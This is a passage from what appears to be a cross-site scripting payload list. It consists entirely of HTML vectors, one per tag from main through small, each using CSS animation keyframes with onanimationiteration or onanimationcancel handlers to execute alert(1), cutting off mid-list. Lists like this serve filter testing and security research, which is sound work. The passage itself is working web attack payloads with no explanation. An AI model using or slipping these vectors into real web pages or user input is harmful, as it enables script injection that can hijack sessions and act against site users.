{}</style><main 
style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></main> +<style>@keyframes slidein {}</style><map style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></map> +<style>@keyframes slidein {}</style><mark style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></mark> +<style>@keyframes slidein {}</style><marquee style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></marquee> +<style>@keyframes slidein {}</style><menu style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></menu> +<style>@keyframes slidein {}</style><menuitem style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></menuitem> +<style>@keyframes slidein {}</style><meta style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></meta> +<style>@keyframes slidein {}</style><meter style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></meter> +<style>@keyframes slidein {}</style><multicol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></multicol> +<style>@keyframes slidein {}</style><nav style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nav> +<style>@keyframes slidein {}</style><nextid style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nextid> +<style>@keyframes slidein {}</style><nobr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nobr> +<style>@keyframes slidein {}</style><noembed 
style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noembed> +<style>@keyframes slidein {}</style><noframes style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noframes> +<style>@keyframes slidein {}</style><noscript style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noscript> +<style>@keyframes slidein {}</style><object style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></object> +<style>@keyframes slidein {}</style><ol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ol> +<style>@keyframes slidein {}</style><optgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></optgroup> +<style>@keyframes slidein {}</style><option style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></option> +<style>@keyframes slidein {}</style><output style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></output> +<style>@keyframes slidein {}</style><p style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></p> +<style>@keyframes slidein {}</style><param style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></param> +<style>@keyframes slidein {}</style><picture style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></picture> +<style>@keyframes slidein {}</style><plaintext style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></plaintext> +<style>@keyframes slidein 
{}</style><pre style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></pre> +<style>@keyframes slidein {}</style><progress style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></progress> +<style>@keyframes slidein {}</style><q style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></q> +<style>@keyframes slidein {}</style><rb style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rb> +<style>@keyframes slidein {}</style><rp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rp> +<style>@keyframes slidein {}</style><rt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rt> +<style>@keyframes slidein {}</style><rtc style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rtc> +<style>@keyframes slidein {}</style><ruby style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ruby> +<style>@keyframes slidein {}</style><s style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></s> +<style>@keyframes slidein {}</style><samp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></samp> +<style>@keyframes slidein {}</style><script style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></script> +<style>@keyframes slidein {}</style><section style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></section> +<style>@keyframes slidein {}</style><select 
style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></select> +<style>@keyframes slidein {}</style><shadow style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></shadow> +<style>@keyframes slidein {}</style><slot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></slot> +<style>@keyframes slidein {}</style><small style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></small> +<style>@keyframes slidein {}</style><source style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></source> +<style>@keyframes slidein {}</style><spacer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></spacer> +<style>@keyframes slidein {}</style><span style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></span> +<style>@keyframes slidein {}</style><strike style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strike> +<style>@keyframes slidein {}</style><strong style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strong> +<style>@keyframes slidein {}</style><style style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></style> +<style>@keyframes slidein {}</style><sub style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sub> +<style>@keyframes slidein {}</style><summary style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></summary> +<style>@keyframes slidein {}</style><sup 
style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sup> +<style>@keyframes slidein {}</style><svg style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></svg> +<style>@keyframes slidein {}</style><table style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></table> +<style>@keyframes slidein {}</style><tbody style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tbody> +<style>@keyframes slidein {}</style><td style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></td> +<style>@keyframes slidein {}</style><template style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></template> +<style>@keyframes slidein {}</style><textarea style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></textarea> +<style>@keyframes slidein {}</style><tfoot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tfoot> +<style>@keyframes slidein {}</style><th style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></th> +<style>@keyframes slidein {}</style><thead style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></thead> +<style>@keyframes slidein {}</style><time style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></time> +<style>@keyframes slidein {}</style><title style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></title> +<style>@keyframes slidein {}</style><tr 
style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tr> +<style>@keyframes slidein {}</style><track style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></track> +<style>@keyframes slidein {}</style><tt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tt> +<style>@keyframes slidein {}</style><u style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></u> +<style>@keyframes slidein {}</style><ul style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ul> +<style>@keyframes slidein {}</style><var style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></var> +<style>@keyframes slidein {}</style><video style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></video> +<style>@keyframes slidein {}</style><wbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></wbr> +<style>@keyframes slidein {}</style><xmp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xmp> +<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><abbr id=x style="position:absolute;" onanimationcancel="alert(1)"></abbr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target 
{animation:10s ease-in-out 0s 1 x;}</style><acronym id=x style="position:absolute;" onanimationcancel="alert(1)"></acronym> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><address id=x style="position:absolute;" onanimationcancel="alert(1)"></address> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><applet id=x style="position:absolute;" onanimationcancel="alert(1)"></applet> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><area id=x style="position:absolute;" onanimationcancel="alert(1)"></area> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><article id=x style="position:absolute;" onanimationcancel="alert(1)"></article> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><aside id=x style="position:absolute;" onanimationcancel="alert(1)"></aside> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><audio id=x style="position:absolute;" onanimationcancel="alert(1)"></audio> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><b id=x style="position:absolute;" onanimationcancel="alert(1)"></b> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><base id=x style="position:absolute;" onanimationcancel="alert(1)"></base> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><basefont id=x style="position:absolute;" onanimationcancel="alert(1)"></basefont> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdi id=x style="position:absolute;" onanimationcancel="alert(1)"></bdi> +<style>@keyframes x{from {left:0;}to {left: 
1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdo id=x style="position:absolute;" onanimationcancel="alert(1)"></bdo> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bgsound id=x style="position:absolute;" onanimationcancel="alert(1)"></bgsound> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><big id=x style="position:absolute;" onanimationcancel="alert(1)"></big> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blink id=x style="position:absolute;" onanimationcancel="alert(1)"></blink> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blockquote id=x style="position:absolute;" onanimationcancel="alert(1)"></blockquote> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><body id=x style="position:absolute;" onanimationcancel="alert(1)"></body> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><br id=x style="position:absolute;" onanimationcancel="alert(1)"></br> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><button id=x style="position:absolute;" onanimationcancel="alert(1)"></button> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><canvas id=x style="position:absolute;" onanimationcancel="alert(1)"></canvas> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><caption id=x style="position:absolute;" onanimationcancel="alert(1)"></caption> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><center id=x style="position:absolute;" onanimationcancel="alert(1)"></center> +<style>@keyframes x{from 
{left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><cite id=x style="position:absolute;" onanimationcancel="alert(1)"></cite> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><code id=x style="position:absolute;" onanimationcancel="alert(1)"></code> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><col id=x style="position:absolute;" onanimationcancel="alert(1)"></col> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><colgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></colgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><command id=x style="position:absolute;" onanimationcancel="alert(1)"></command> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><content id=x style="position:absolute;" onanimationcancel="alert(1)"></content> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><data id=x style="position:absolute;" onanimationcancel="alert(1)"></data> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><datalist id=x style="position:absolute;" onanimationcancel="alert(1)"></datalist> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dd id=x style="position:absolute;" onanimationcancel="alert(1)"></dd> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><del id=x style="position:absolute;" onanimationcancel="alert(1)"></del> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><details id=x style="position:absolute;" onanimationcancel="alert(1)"></details> +<style>@keyframes 
x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dfn id=x style="position:absolute;" onanimationcancel="alert(1)"></dfn> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dialog id=x style="position:absolute;" onanimationcancel="alert(1)"></dialog> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dir id=x style="position:absolute;" onanimationcancel="alert(1)"></dir> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><div id=x style="position:absolute;" onanimationcancel="alert(1)"></div> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dl id=x style="position:absolute;" onanimationcancel="alert(1)"></dl> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dt id=x style="position:absolute;" onanimationcancel="alert(1)"></dt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><element id=x style="position:absolute;" onanimationcancel="alert(1)"></element> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><em id=x style="position:absolute;" onanimationcancel="alert(1)"></em> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><embed id=x style="position:absolute;" onanimationcancel="alert(1)"></embed> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><fieldset id=x style="position:absolute;" onanimationcancel="alert(1)"></fieldset> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figcaption id=x style="position:absolute;" onanimationcancel="alert(1)"></figcaption> +<style>@keyframes 
x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figure id=x style="position:absolute;" onanimationcancel="alert(1)"></figure> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><font id=x style="position:absolute;" onanimationcancel="alert(1)"></font> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><footer id=x style="position:absolute;" onanimationcancel="alert(1)"></footer> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><form id=x style="position:absolute;" onanimationcancel="alert(1)"></form> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frame id=x style="position:absolute;" onanimationcancel="alert(1)"></frame> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frameset id=x style="position:absolute;" onanimationcancel="alert(1)"></frameset> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><h1 id=x style="position:absolute;" onanimationcancel="alert(1)"></h1> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><head id=x style="position:absolute;" onanimationcancel="alert(1)"></head> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><header id=x style="position:absolute;" onanimationcancel="alert(1)"></header> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></hgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hr id=x style="position:absolute;" onanimationcancel="alert(1)"></hr> +<style>@keyframes 
x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><html id=x style="position:absolute;" onanimationcancel="alert(1)"></html> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><i id=x style="position:absolute;" onanimationcancel="alert(1)"></i> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style="position:absolute;" onanimationcancel="alert(1)"></iframe> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><image id=x style="position:absolute;" onanimationcancel="alert(1)"></image> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><img id=x style="position:absolute;" onanimationcancel="alert(1)"></img> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><input id=x style="position:absolute;" onanimationcancel="alert(1)"></input> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ins id=x style="position:absolute;" onanimationcancel="alert(1)"></ins> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><isindex id=x style="position:absolute;" onanimationcancel="alert(1)"></isindex> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><kbd id=x style="position:absolute;" onanimationcancel="alert(1)"></kbd> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><keygen id=x style="position:absolute;" onanimationcancel="alert(1)"></keygen> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><label id=x style="position:absolute;" onanimationcancel="alert(1)"></label> +<style>@keyframes x{from 
{left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><legend id=x style="position:absolute;" onanimationcancel="alert(1)"></legend> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><li id=x style="position:absolute;" onanimationcancel="alert(1)"></li> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><link id=x style="position:absolute;" onanimationcancel="alert(1)"></link> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><listing id=x style="position:absolute;" onanimationcancel="alert(1)"></listing> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><main id=x style="position:absolute;" onanimationcancel="alert(1)"></main> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><map id=x style="position:absolute;" onanimationcancel="alert(1)"></map> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><mark id=x style="position:absolute;" onanimationcancel="alert(1)"></mark> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><marquee id=x style="position:absolute;" onanimationcancel="alert(1)"></marquee> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menu id=x style="position:absolute;" onanimationcancel="alert(1)"></menu> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menuitem id=x style="position:absolute;" onanimationcancel="alert(1)"></menuitem> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meta id=x style="position:absolute;" onanimationcancel="alert(1)"></meta> +<style>@keyframes x{from 
{left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meter id=x style="position:absolute;" onanimationcancel="alert(1)"></meter> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><multicol id=x style="position:absolute;" onanimationcancel="alert(1)"></multicol> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nav id=x style="position:absolute;" onanimationcancel="alert(1)"></nav> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nextid id=x style="position:absolute;" onanimationcancel="alert(1)"></nextid> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nobr id=x style="position:absolute;" onanimationcancel="alert(1)"></nobr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noembed id=x style="position:absolute;" onanimationcancel="alert(1)"></noembed> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noframes id=x style="position:absolute;" onanimationcancel="alert(1)"></noframes> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noscript id=x style="position:absolute;" onanimationcancel="alert(1)"></noscript> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><object id=x style="position:absolute;" onanimationcancel="alert(1)"></object> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ol id=x style="position:absolute;" onanimationcancel="alert(1)"></ol> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><optgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></optgroup> 
+<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><option id=x style="position:absolute;" onanimationcancel="alert(1)"></option> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><output id=x style="position:absolute;" onanimationcancel="alert(1)"></output> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><p id=x style="position:absolute;" onanimationcancel="alert(1)"></p> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><param id=x style="position:absolute;" onanimationcancel="alert(1)"></param> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><picture id=x style="position:absolute;" onanimationcancel="alert(1)"></picture> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><plaintext id=x style="position:absolute;" onanimationcancel="alert(1)"></plaintext> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><pre id=x style="position:absolute;" onanimationcancel="alert(1)"></pre> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><progress id=x style="position:absolute;" onanimationcancel="alert(1)"></progress> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><q id=x style="position:absolute;" onanimationcancel="alert(1)"></q> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rb id=x style="position:absolute;" onanimationcancel="alert(1)"></rb> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rp id=x style="position:absolute;" onanimationcancel="alert(1)"></rp> 
+<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rt id=x style="position:absolute;" onanimationcancel="alert(1)"></rt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rtc id=x style="position:absolute;" onanimationcancel="alert(1)"></rtc> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ruby id=x style="position:absolute;" onanimationcancel="alert(1)"></ruby> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><s id=x style="position:absolute;" onanimationcancel="alert(1)"></s> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><samp id=x style="position:absolute;" onanimationcancel="alert(1)"></samp> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><script id=x style="position:absolute;" onanimationcancel="alert(1)"></script> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><section id=x style="position:absolute;" onanimationcancel="alert(1)"></section> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><select id=x style="position:absolute;" onanimationcancel="alert(1)"></select> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><shadow id=x style="position:absolute;" onanimationcancel="alert(1)"></shadow> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><slot id=x style="position:absolute;" onanimationcancel="alert(1)"></slot> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><small id=x style="position:absolute;" onanimationcancel="alert(1)"></small> 
